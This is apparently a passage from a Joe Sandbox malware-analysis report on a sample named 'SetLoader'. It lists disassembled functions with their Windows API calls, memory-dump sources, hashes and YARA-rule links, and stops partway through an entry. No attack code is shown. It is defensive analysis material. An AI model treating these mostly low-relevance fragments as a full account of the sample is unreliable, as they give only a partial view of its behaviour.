                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0062C375
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: BitmapCreateFromGdipStream
                                              • String ID:
                                              • API String ID: 1918208029-0
                                              • Opcode ID: 773bd8cc15a7c5d6a06cd26cbb3533dbc14215175a9651de3dbb46d3d920f0c0
                                              • Instruction ID: 802a9769dd0513d449b1dc19afba38a3a648983d8c34dc0a7a9e597ded47c9d4
                                              • Opcode Fuzzy Hash: 773bd8cc15a7c5d6a06cd26cbb3533dbc14215175a9651de3dbb46d3d920f0c0
                                              • Instruction Fuzzy Hash: E3E06D71400618EBCB54DF95C800B9DB7F9EB05320F10C01EE88697200D770AE449F90
                                              Function 006351AC Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006351CA
                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 006351D5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                              • String ID:
                                              • API String ID: 1660781231-0
                                              • Opcode ID: dafc544f65bf1ac2c85a0a67fb98b028d8af5232608417e7c8017afb222c3bf5
                                              • Instruction ID: d00ff97ffcbf59107cb8fa71fb67d3b59395367f53c7528e1602b4987d74a812
                                              • Opcode Fuzzy Hash: dafc544f65bf1ac2c85a0a67fb98b028d8af5232608417e7c8017afb222c3bf5
                                              • Instruction Fuzzy Hash: 63D02324D44F01549D947670AD137AB17C35D02775FF0665DF423871C2DF12444065D5
                                              Function 00611341 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ItemShowWindow
                                              • String ID:
                                              • API String ID: 3351165006-0
                                              • Opcode ID: 61ac8da7976a73c33d3a20562a9cd6b7ef36a61a6bebec4da534e86e243f79e9
                                              • Instruction ID: 9e82ca47aeb22eab80c18afdab91a76ce94fbad452f42ffef11ba2b3542a909a
                                              • Opcode Fuzzy Hash: 61ac8da7976a73c33d3a20562a9cd6b7ef36a61a6bebec4da534e86e243f79e9
                                              • Instruction Fuzzy Hash: F4C0123205C200BECB010BB0DC09C2ABBEAABA4222F58CA18F0AAC1060C239C050DB51
                                              Function 00611323 Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDlgItem.USER32(?,?), ref: 00611331
                                              • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00611338
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: CallbackDispatcherItemUser
                                              • String ID:
                                              • API String ID: 4250310104-0
                                              • Opcode ID: cf98efa8eb9403097b657a7230fc1643fccc106d6cc4356ebf44888f4f5b9b5f
                                              • Instruction ID: 274041b684202332a233364c2a33f657c9d0feaaf236631c1547ee9e41998312
                                              • Opcode Fuzzy Hash: cf98efa8eb9403097b657a7230fc1643fccc106d6cc4356ebf44888f4f5b9b5f
                                              • Instruction Fuzzy Hash: 4BC04C7640C240BFCB055BB0DD0CC2FBFBAAB94311F94D959B5A981020C6358450DB51
                                              Function 00611B63 Relevance: 1.8, APIs: 1, Instructions: 311COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: H_prolog3
                                              • String ID:
                                              • API String ID: 431132790-0
                                              • Opcode ID: 4707c00383b97adcefaaa56e1e3cfdfc210809aa13ac31645f903962ef6b07eb
                                              • Instruction ID: e5c4ce6a38d5e91b976e6bfbb441ab52035b9f69c4b2e825cb7565ad1ca34d54
                                              • Opcode Fuzzy Hash: 4707c00383b97adcefaaa56e1e3cfdfc210809aa13ac31645f903962ef6b07eb
                                              • Instruction Fuzzy Hash: 84C1AF74A042559FDF25CF68C4947E97BA2AF0B310F1C00B9ED069F396CB749A85CBA1
                                              Function 0061147C Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 00611483
                                                • Part of subcall function 00616AE8: __EH_prolog3.LIBCMT ref: 00616AEF
                                                • Part of subcall function 0061EE0F: __EH_prolog3.LIBCMT ref: 0061EE16
                                                • Part of subcall function 0061668F: __EH_prolog3.LIBCMT ref: 00616696
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: H_prolog3
                                              • String ID:
                                              • API String ID: 431132790-0
                                              • Opcode ID: 6ffb642f0f24f6d1e3cf8bc5fe6f1f39c3b892392bd211d86751fed7481fa5a6
                                              • Instruction ID: f18128dbbd50883ee806c5eb6782a0b6cbaea1f67a9bd5cff8ce317036021a70
                                              • Opcode Fuzzy Hash: 6ffb642f0f24f6d1e3cf8bc5fe6f1f39c3b892392bd211d86751fed7481fa5a6
                                              • Instruction Fuzzy Hash: 904116B1A063808ECB54DF6994812D97BE2AF5A300F0C01BEEC5DCF29BD7715255CBA6
                                              Function 0063D2E8 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0063D348
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AddressProc
                                              • String ID:
                                              • API String ID: 190572456-0
                                              • Opcode ID: ab5709f1d64a4bd3a57f1971ec590bb8ffd01ebb5dbf58f577fd6a6c4a535d67
                                              • Instruction ID: 2ab3d34b985a057defccad737f8938182cba42ec7480d8355c03060d796b3627
                                              • Opcode Fuzzy Hash: ab5709f1d64a4bd3a57f1971ec590bb8ffd01ebb5dbf58f577fd6a6c4a535d67
                                              • Instruction Fuzzy Hash: 6111CA33A006259BAB25DE28FC509EE7397EB8B360F1A4224FD15AB354D630DC0186D2
                                              Function 0063EAC9 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0063D786: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0063B9D3,00000001,00000364,?,00636E12,?,?,?,0063688D,00000050,?), ref: 0063D7C7
                                              • _free.LIBCMT ref: 0063EB35
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AllocateHeap_free
                                              • String ID:
                                              • API String ID: 614378929-0
                                              • Opcode ID: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
                                              • Instruction ID: bf27b5e40bc0504af0447ff50870b0a02e0757513331a84ae6ca338be0ceca5b
                                              • Opcode Fuzzy Hash: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
                                              • Instruction Fuzzy Hash: 4101F9722003456BE331CF69DC8299AFBEEFB85370F25051DE595832C0EA71A805C7B8
                                              Function 0063D786 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0063B9D3,00000001,00000364,?,00636E12,?,?,?,0063688D,00000050,?), ref: 0063D7C7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: e5c04b2583b503509ffcf0c43cd1b6c24e72c636a44b03c209b925184a62e47e
                                              • Instruction ID: a1262510e4ff387fec33bf2459482148f31ca2325dc671fdb46074855b2eb9a9
                                              • Opcode Fuzzy Hash: e5c04b2583b503509ffcf0c43cd1b6c24e72c636a44b03c209b925184a62e47e
                                              • Instruction Fuzzy Hash: 9CF0E232600720A7DB356F72FC45BDB77ABEF817A0F145011F80896695CB70DD0186E5
                                              Function 0063BC8E Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00636A24,?,0000015D,?,?,?,?,00637F00,000000FF,00000000,?,?), ref: 0063BCC0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: d7e98296b23ae451acb020fe1f63cd3478b255dc20e9ed183f2569c34297b345
                                              • Instruction ID: 7b35903afb17c933871b25c6966c0c633a747d772c0bca4e474a807a0dd916b3
                                              • Opcode Fuzzy Hash: d7e98296b23ae451acb020fe1f63cd3478b255dc20e9ed183f2569c34297b345
                                              • Instruction Fuzzy Hash: 92E0ED3560062266D73027A1EC01B9B3A8BCF927A0F193121FE05A6392CF60CC0282E9
                                              Function 0061AFD0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                              Download Yara Rule
                                              APIs
                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,0061AF75,5CB4B331,00000000,0064517A,000000FF,?,00618882,?,?), ref: 0061AFEB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ChangeCloseFindNotification
                                              • String ID:
                                              • API String ID: 2591292051-0
                                              • Opcode ID: f03958609f07f03568b1aa1280d4019fdc1593d210282f83cde73d47420e2826
                                              • Instruction ID: 0f3479518fd98299ebd2a9aea15ef8127083187ff8a823fc8ae996d81d4260c4
                                              • Opcode Fuzzy Hash: f03958609f07f03568b1aa1280d4019fdc1593d210282f83cde73d47420e2826
                                              • Instruction Fuzzy Hash: 61F05471486B069EDB349A24C4587D2B7F56B1632AF0C1B1DD0E3426E0D361A5CED651
                                              Function 0061C37A Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0061C4A8: FindFirstFileW.KERNELBASE(?,?,00000000,?,?,?,0061C39F,000000FF,?,?,?,?,006187BC,?,?,00000000), ref: 0061C4E6
                                                • Part of subcall function 0061C4A8: FindFirstFileW.KERNEL32(?,00000000,?,?,00000800,?,?,0061C39F,000000FF,?,?,?,?,006187BC,?,?), ref: 0061C516
                                                • Part of subcall function 0061C4A8: GetLastError.KERNEL32(?,?,00000800,?,?,0061C39F,000000FF,?,?,?,?,006187BC,?,?,00000000,0000003A), ref: 0061C522
                                              • FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,006187BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 0061C3A5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Find$FileFirst$CloseErrorLast
                                              • String ID:
                                              • API String ID: 1464966427-0
                                              • Opcode ID: c7ab113d44d56f7f2aa34e73b725733c995ed13f0717ce2af9919a0c9c19a204
                                              • Instruction ID: 2407839a796a8976b2fb91ee62d19fcfdc975399da3897fa8b99c647f261f068
                                              • Opcode Fuzzy Hash: c7ab113d44d56f7f2aa34e73b725733c995ed13f0717ce2af9919a0c9c19a204
                                              • Instruction Fuzzy Hash: B9F0E235088780AACB621BB498017DA7B925F26332F08CA0DF1FE121A2C2B060C58B72
                                              Function 00622EE4 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 00622F19
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ExecutionStateThread
                                              • String ID:
                                              • API String ID: 2211380416-0
                                              • Opcode ID: 81bfca070d1cdadf377924ea7d2952e7580ed02ad52a33b22d4714989e74a104
                                              • Instruction ID: 74df4126d3a31184aee6bcfb821cc9b9679eda4c7a50d824f88cda28204db750
                                              • Opcode Fuzzy Hash: 81bfca070d1cdadf377924ea7d2952e7580ed02ad52a33b22d4714989e74a104
                                              • Instruction Fuzzy Hash: 89D02B00B8C63165D7563B24782A7FD15271FC3312F0C002AB009673D38B5E0C8686F6
                                              Function 0062C5B6 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GdipAlloc.GDIPLUS(00000010), ref: 0062C5BC
                                                • Part of subcall function 0062C34D: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0062C36E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                              • String ID:
                                              • API String ID: 1915507550-0
                                              • Opcode ID: bb184948fac70443b701d804218a49dfe2ebbc7c187f1a67eea2f7faab0ba8dc
                                              • Instruction ID: a4a0dc5fbc79ddff60ac5764fed04fed579bdfe7772609742f34372984ef1a04
                                              • Opcode Fuzzy Hash: bb184948fac70443b701d804218a49dfe2ebbc7c187f1a67eea2f7faab0ba8dc
                                              • Instruction Fuzzy Hash: D9D0A730600608B6DF416B30DC0297E7596DB00350F0084257801D9140EEB1DA20ADA1
                                              Function 0063017F Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 006301A4
                                                • Part of subcall function 0062D864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0062D875
                                                • Part of subcall function 0062D864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0062D886
                                                • Part of subcall function 0062D864: IsDialogMessageW.USER32(00010418,?), ref: 0062D89A
                                                • Part of subcall function 0062D864: TranslateMessage.USER32(?), ref: 0062D8A8
                                                • Part of subcall function 0062D864: DispatchMessageW.USER32(?), ref: 0062D8B2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                              • String ID:
                                              • API String ID: 897784432-0
                                              • Opcode ID: 3ba28b4286d5625b71726101c85d827e10f23dbde770595ab59228adf6336e93
                                              • Instruction ID: 825b3ccc1d8234104cd737ade6e95e9c2200b3867c559bc44502216f9ddb1c65
                                              • Opcode Fuzzy Hash: 3ba28b4286d5625b71726101c85d827e10f23dbde770595ab59228adf6336e93
                                              • Instruction Fuzzy Hash: B1D09E71158300BAD7416B51DD06F1E7AE3BB98B05F005558B288340F5C662AE21AF1A
                                              Function 00630A98 Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • DloadProtectSection.DELAYIMP ref: 00630AC0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
